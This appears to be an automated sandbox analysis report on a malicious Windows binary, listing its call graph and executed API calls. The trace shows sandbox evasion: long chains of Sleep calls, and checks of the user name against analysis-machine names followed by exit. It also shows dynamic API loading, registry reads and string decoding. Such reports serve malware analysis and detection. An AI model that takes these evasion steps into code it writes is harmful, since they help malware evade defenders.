89424 352aed GetCurrentProcessId 89423->89424 90260 34fb18 OpenProcess 89424->90260 89427 34e682 2 API calls 89428 352b0c 89427->89428 89429 34e63b lstrcpyA 89428->89429 89430 352b15 89429->89430 89431 34e6d4 3 API calls 89430->89431 89432 352b32 89431->89432 89433 34e63b lstrcpyA 89432->89433 89434 352b3b 89433->89434 89435 34e6d4 3 API calls 89434->89435 89436 352b54 89435->89436 89437 34e63b lstrcpyA 89436->89437 89438 352b5d 89437->89438 89439 34e6d4 3 API calls 89438->89439 89440 352b72 89439->89440 89441 34e63b lstrcpyA 89440->89441 89442 352b7b 89441->89442 89443 34e6d4 3 API calls 89442->89443 89444 352b94 89443->89444 89445 34e63b lstrcpyA 89444->89445 89446 352b9d 89445->89446 90265 34f1be GetProcessHeap HeapAlloc 89446->90265 89449 34e6d4 3 API calls 89450 352bb7 89449->89450 89451 34e63b lstrcpyA 89450->89451 89452 352bc0 89451->89452 89453 34e6d4 3 API calls 89452->89453 89454 352bd5 89453->89454 89455 34e63b lstrcpyA 89454->89455 89456 352bde 89455->89456 89457 34e6d4 3 API calls 89456->89457 89458 352bf7 89457->89458 89459 34e63b lstrcpyA 89458->89459 89460 352c00 89459->89460 90272 34f2ff _EH_prolog CoInitializeEx CoInitializeSecurity CoCreateInstance 89460->90272 89463 34e682 2 API calls 89464 352c1f 89463->89464 89465 34e63b lstrcpyA 89464->89465 89466 352c28 89465->89466 89467 34e6d4 3 API calls 89466->89467 89468 352c45 89467->89468 90175 359035 _MSFOpenExW 90174->90175 90176 359044 90175->90176 90191 358135 lstrlenA lstrcpyA _MSFOpenExW 90175->90191 90180 3581ca 90176->90180 90179 35905a _MSFOpenExW 90179->88846 90181 3581dd 90180->90181 90184 358239 90180->90184 90182 358240 90181->90182 90183 358210 SetFilePointer 90181->90183 90181->90184 90185 358246 CreateFileA 90182->90185 90186 358280 90182->90186 90183->90184 90184->90179 90187 358266 90185->90187 90186->90184 90188 3582aa CreateFileMappingA 90186->90188 90187->90184 90188->90184 90189 3582c6 MapViewOfFile 90188->90189 90189->90184 90190 3582dc CloseHandle 90189->90190 90190->90184 90191->90176 90193 34e5b4 lstrcpyA 90192->90193 90194 35163f 90193->90194 90195 34e5b4 lstrcpyA 90194->90195 90196 35164b 90195->90196 90197 34e5b4 lstrcpyA 90196->90197 90198 351657 90197->90198 90198->88947 90199->88944 90200->88906 90201->88931 90202->88906 90203->88921 90204->88906 90206 34e57d lstrcpyA 90205->90206 90207 342088 90206->90207 90207->88909 90208->88906 90209->88906 90211 34f066 90210->90211 90212 34efd8 90210->90212 90214 34e57d lstrcpyA 90211->90214 90213 34e57d lstrcpyA 90212->90213 90215 34efe7 memset 90213->90215 90216 34f073 90214->90216 90217 34f009 90215->90217 90216->88975 90227 34fc4f lstrcpyA malloc strncpy 90217->90227 90219 34f013 90220 34f01d lstrcatA 90219->90220 90228 34e5e8 90220->90228 90222 34f033 lstrcatA 90223 34f04d 90222->90223 90224 34e57d lstrcpyA 90223->90224 90225 34f05c 90224->90225 90225->90216 90226->88979 90227->90219 90229 34e5ef 90228->90229 90229->90222 90231 343f01 90230->90231 90231->90231 90232 343f08 ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 90231->90232 90239 34e766 90232->90239 90234 343f4a lstrlenA 90240 34e766 90234->90240 90236 343f5a InternetCrackUrlA 90237 343f74 90236->90237 90237->88988 90238->89113 90239->90234 90240->90236 90241->89122 90242->89299 90243->89301 90244->89303 90245->89305 90246->89309 90247->89311 90249 34613d 90248->90249 90250 346a6b LocalAlloc 90248->90250 90249->89166 90249->89180 90250->90249 90251 346a7b CryptStringToBinaryA 90250->90251 90251->90249 90252 346a92 LocalFree 90251->90252 90252->90249 90253->89319 90254->89327 90255->89338 90256->89369 90258 34ef94 RegCloseKey CharToOemA 90257->90258 90259 34ef79 RegQueryValueExA 90257->90259 90258->89383 90259->90258 90261 34fb54 90260->90261 90262 34fb38 K32GetModuleFileNameExA CloseHandle 90260->90262 90263 34e57d lstrcpyA 90261->90263 90262->90261 90264 34fb63 90263->90264 90264->89427 90390 34e7d6 90265->90390 90268 34f1f1 RegOpenKeyExA 90270 34f211 RegQueryValueExA 90268->90270 90271 34f229 RegCloseKey 90268->90271 90269 34f1ea 90269->89449 90270->90271 90271->90269 90273 34f365 90272->90273 90274 34f36d CoSetProxyBlanket 90273->90274 90277 34f466 90273->90277 90278 34f39d 90274->90278 90275 34e57d lstrcpyA 90276 34f477 90275->90276 90276->89463 90277->90275 90278->90277 90279 34f3d1 VariantInit 90278->90279 90280 34f3f0 90279->90280 90397 34f237 _EH_prolog CoCreateInstance 90280->90397 90282 34f3fe FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 90283 34e57d lstrcpyA 90282->90283 90393 34e769 GetProcessHeap HeapAlloc RegOpenKeyExA 90390->90393 90392 34e7db 90392->90268 90392->90269 90394 34e7c3 RegCloseKey 90393->90394 90395 34e7ac RegQueryValueExA 90393->90395 90396 34e7d2 90394->90396 90395->90394 90396->90392 90398 34f270 SysAllocString 90397->90398 90399 34f2d6 90397->90399 90398->90399 90400 34f27f 90398->90400 90399->90282 90401 34f2cf SysFreeString 90400->90401 90402 34f2ab _wtoi64 SysFreeString 90400->90402 90401->90399 90402->90401 92651 61e84a87 92652 61e84a9e 92651->92652 92658 61e84b2e 92651->92658 92667 61e2a0e4 free memmove realloc malloc 92652->92667 92654 61e84ac1 92655 61e11243 free 92654->92655 92656 61e84acd 92655->92656 92657 61e84d5a 92656->92657 92656->92658 92672 61e16690 free 92657->92672 92663 61e84b97 92658->92663 92668 61e1b434 free realloc malloc 92658->92668 92661 61e84d65 92662 61e4c7c5 25 API calls 92662->92663 92663->92662 92669 61e1a839 free realloc malloc 92663->92669 92670 61e16f42 free 92663->92670 92671 61e52f4f 22 API calls 92663->92671 92667->92654 92668->92663 92669->92663 92670->92663 92671->92663 92672->92661 92673 61e1d21e 92675 61e1d184 92673->92675 92674 61e1d19b 92675->92674 92676 61e1d1f9 92675->92676 92677 61e1d1b7 92675->92677 92684 61e13ed7 92676->92684 92691 61e1a8b5 free realloc malloc 92677->92691 92680 61e1d201 92680->92674 92692 61e1a839 free realloc malloc 92680->92692 92681 61e1d1be 92681->92674 92683 61e0aee0 free 92681->92683 92683->92674 92685 61e13ee8 92684->92685 92686 61e13efe 92685->92686 92688 61e13f0b 92685->92688 92687 61e0ae03 free 92686->92687 92689 61e13f06 92687->92689 92688->92689 92693 61e2a652 realloc 92688->92693 92689->92680 92691->92681 92692->92674 92694 61e2a683 92693->92694 92695 61e2a676 92693->92695 92697 61e2a4ce free realloc malloc 92694->92697 92695->92689 92697->92695

                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                      Function 0035549F Relevance: 359.2, APIs: 202, Strings: 3, Instructions: 481sleeplibraryloaderCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 003410B4: MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 003410D4
                                                                                                                                                                                        • Part of subcall function 003410B4: GetLastError.KERNEL32(?,?,?,003554AD), ref: 003410DA
                                                                                                                                                                                        • Part of subcall function 003410B4: SetCriticalSectionSpinCount.KERNEL32(00000000,00000000,?,?,?,003554AD), ref: 003410E2
                                                                                                                                                                                        • Part of subcall function 003410B4: GetWindowContextHelpId.USER32(00000000), ref: 003410E9
                                                                                                                                                                                        • Part of subcall function 003410B4: GetWindowLongW.USER32(00000000,00000000), ref: 003410F1
                                                                                                                                                                                        • Part of subcall function 003410B4: RegisterClassW.USER32(00000000), ref: 003410F8
                                                                                                                                                                                        • Part of subcall function 003410B4: IsWindowVisible.USER32(00000000), ref: 003410FF
                                                                                                                                                                                        • Part of subcall function 003410B4: ConvertDefaultLocale.KERNEL32(00000000,?,?,?,003554AD), ref: 00341106
                                                                                                                                                                                        • Part of subcall function 003410B4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,003554AD), ref: 00341112
                                                                                                                                                                                        • Part of subcall function 003410B4: IsDialogMessageW.USER32(00000000,00000000), ref: 0034111A
                                                                                                                                                                                        • Part of subcall function 003410B4: GetProcessHeap.KERNEL32(00000000,?,?,?,?,003554AD), ref: 00341124
                                                                                                                                                                                        • Part of subcall function 003410B4: HeapFree.KERNEL32(00000000,?,?,?,003554AD), ref: 0034112B
                                                                                                                                                                                        • Part of subcall function 00341134: GetTempPathW.KERNEL32(00000104,?), ref: 00341154
                                                                                                                                                                                        • Part of subcall function 00341134: wsprintfW.USER32 ref: 0034117A
                                                                                                                                                                                        • Part of subcall function 00341134: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 003411AA
                                                                                                                                                                                        • Part of subcall function 00341134: GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 003411BF
                                                                                                                                                                                        • Part of subcall function 00341134: RtlAllocateHeap.NTDLL(00000000), ref: 003411C6
                                                                                                                                                                                        • Part of subcall function 00341134: _time64.MSVCRT ref: 003411CF
                                                                                                                                                                                        • Part of subcall function 00341134: srand.MSVCRT ref: 003411D5
                                                                                                                                                                                        • Part of subcall function 00341134: rand.MSVCRT ref: 003411DA
                                                                                                                                                                                        • Part of subcall function 00341134: memset.MSVCRT ref: 003411EA
                                                                                                                                                                                        • Part of subcall function 00341134: WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 003411FC
                                                                                                                                                                                        • Part of subcall function 00341134: memset.MSVCRT ref: 00341216
                                                                                                                                                                                        • Part of subcall function 00341134: CloseHandle.KERNEL32(?), ref: 00341221
                                                                                                                                                                                        • Part of subcall function 00341134: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0034123D
                                                                                                                                                                                        • Part of subcall function 00341134: ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 00341253
                                                                                                                                                                                      • LoadLibraryA.KERNEL32(000007CE), ref: 003554BE
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Sleep), ref: 003554DA
                                                                                                                                                                                      • Sleep.KERNEL32(00000014), ref: 003554E5
                                                                                                                                                                                      • Sleep.KERNEL32(00000014), ref: 003554E8
                                                                                                                                                                                      • Sleep.KERNEL32(00000014), ref: 003554EF
                                                                                                                                                                                      • Sleep.KERNEL32(00000014), ref: 003554F6
                                                                                                                                                                                      • Sleep.KERNEL32(00000014), ref: 003554FD
                                                                                                                                                                                      • Sleep.KERNEL32(00000014), ref: 00355504
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemTime), ref: 00355510
                                                                                                                                                                                      • Sleep.KERNEL32(00000014), ref: 00355518
                                                                                                                                                                                      • Sleep.KERNEL32(00000014), ref: 0035551F
                                                                                                                                                                                      • Sleep.KERNEL32(00000014), ref: 00355526
                                                                                                                                                                                      • Sleep.KERNEL32(00000014), ref: 0035552D
                                                                                                                                                                                      • Sleep.KERNEL32(00000014), ref: 00355534
                                                                                                                                                                                      • Sleep.KERNEL32(00000014), ref: 0035553B
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemInfo), ref: 00355547
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355557
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035555E
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355565
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035556C
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355573
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035557A
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355581
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355588
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035558F
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355596
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035559D
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003555A4
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003555AB
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003555B2
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003555B9
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003555C0
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003555C7
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003555CE
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003555DA
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003555E1
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003555E8
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003555EF
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003555F6
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003555FD
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355604
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035560B
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355612
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355619
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355620
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355627
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035562E
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355635
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035563C
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355643
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035564A
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355651
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035565D
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355664
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035566B
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355672
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355679
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355680
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355687
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035568E
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355695
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035569C
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003556A3
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003556AA
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003556B1
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003556B8
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003556BF
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003556C6
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003556CD
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003556D4
                                                                                                                                                                                        • Part of subcall function 00341043: strcmp.MSVCRT ref: 0034104E
                                                                                                                                                                                        • Part of subcall function 00341043: strcmp.MSVCRT ref: 00341064
                                                                                                                                                                                        • Part of subcall function 00341043: ExitProcess.KERNEL32 ref: 00341070
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003556E0
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003556E7
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003556EE
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003556F5
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003556FC
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355703
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035570A
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355711
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355718
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035571F
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355726
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035572D
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355734
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035573B
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355742
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355749
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355750
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355757
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355763
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035576A
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355771
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355778
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035577F
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355786
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035578D
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355794
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035579B
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003557A2
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003557A9
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003557B0
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003557B7
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003557BE
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003557C5
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003557CC
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003557D3
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003557DA
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355C0E
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355C25
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355C3C
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355C53
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355C6A
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355C81
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355C98
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355CAF
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355CC6
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355CDD
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355CF4
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355D0B
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355D22
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355D39
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355D50
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355D67
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355D7E
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355D95
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355DAC
                                                                                                                                                                                        • Part of subcall function 00355BCA: GetProcAddress.KERNEL32 ref: 00355DC3
                                                                                                                                                                                        • Part of subcall function 00355BCA: LoadLibraryA.KERNEL32(003557E5), ref: 00355DD4
                                                                                                                                                                                        • Part of subcall function 00355BCA: LoadLibraryA.KERNEL32 ref: 00355DE5
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003557E6
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003557ED
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003557F4
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003557FB
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355802
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355809
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355810
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355817
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035581E
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355825
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035582C
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355833
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035583A
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355841
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355848
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035584F
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355856
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035585D
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C,0035E266), ref: 00355871
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355878
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035587F
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355886
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035588D
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355894
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035589B
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003558A2
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003558A9
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003558B0
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003558B7
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003558BE
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003558C5
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003558CC
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003558D3
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003558DA
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003558E1
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003558E8
                                                                                                                                                                                        • Part of subcall function 0034E7E4: GetProcessHeap.KERNEL32(00000000,00000104,?,HAL9TH,?,00341063,JohnDoe,003555D9), ref: 0034E7F0
                                                                                                                                                                                        • Part of subcall function 0034E7E4: HeapAlloc.KERNEL32(00000000,?,HAL9TH,?,00341063,JohnDoe,003555D9), ref: 0034E7F7
                                                                                                                                                                                        • Part of subcall function 0034E7E4: GetUserNameA.ADVAPI32(00000000,?), ref: 0034E80B
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,?,00361408,?,00000000), ref: 00355953
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0035595E
                                                                                                                                                                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 0035596F
                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00355985
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035598E
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355995
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 0035599C
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003559A3
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003559AA
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003559B1
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003559B8
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003559BF
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003559C6
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003559CD
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003559D4
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003559DB
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003559E2
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003559E9
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003559F0
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003559F7
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 003559FE
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355A05
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355A0C
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355A13
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355A1A
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355A21
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355A28
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355A2F
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355A36
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355A3D
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355A44
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355A4B
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355A52
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355A59
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355A60
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355A67
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355A6E
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355A75
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355A7C
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355A83
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355A8F
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355A96
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355A9D
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355AA4
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355AAB
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355AB2
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355AB9
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355AC0
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355AC7
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355ACE
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355AD5
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355ADC
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355AE3
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355AEA
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355AF1
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355AF8
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355AFF
                                                                                                                                                                                      • Sleep.KERNEL32(0000000C), ref: 00355B06
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00355B0D
                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00355B14
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
